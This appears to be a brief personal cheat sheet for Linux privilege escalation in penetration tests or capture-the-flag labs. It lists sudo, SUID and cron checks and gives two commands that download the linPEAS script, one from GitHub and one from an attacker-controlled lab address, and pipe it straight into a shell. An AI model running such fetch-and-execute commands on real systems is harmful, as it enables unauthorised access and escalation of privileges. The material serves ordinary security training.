# Privilege Escalation
* sudo -l
* search for suid/guid binary
* check the open port from the inside maybe some weird service running on localhost and could be exploited with [portforwarding](portforwarding.md)
```bash
sockstat -4 -l | grep "root"
```

* linpeas
```bash
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

curl 10.10.14.8/linp.sh | sh
```
**Always** check the :
```txt
Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
```

* cronjob (linenum)
#vulnerability #privesc #linux 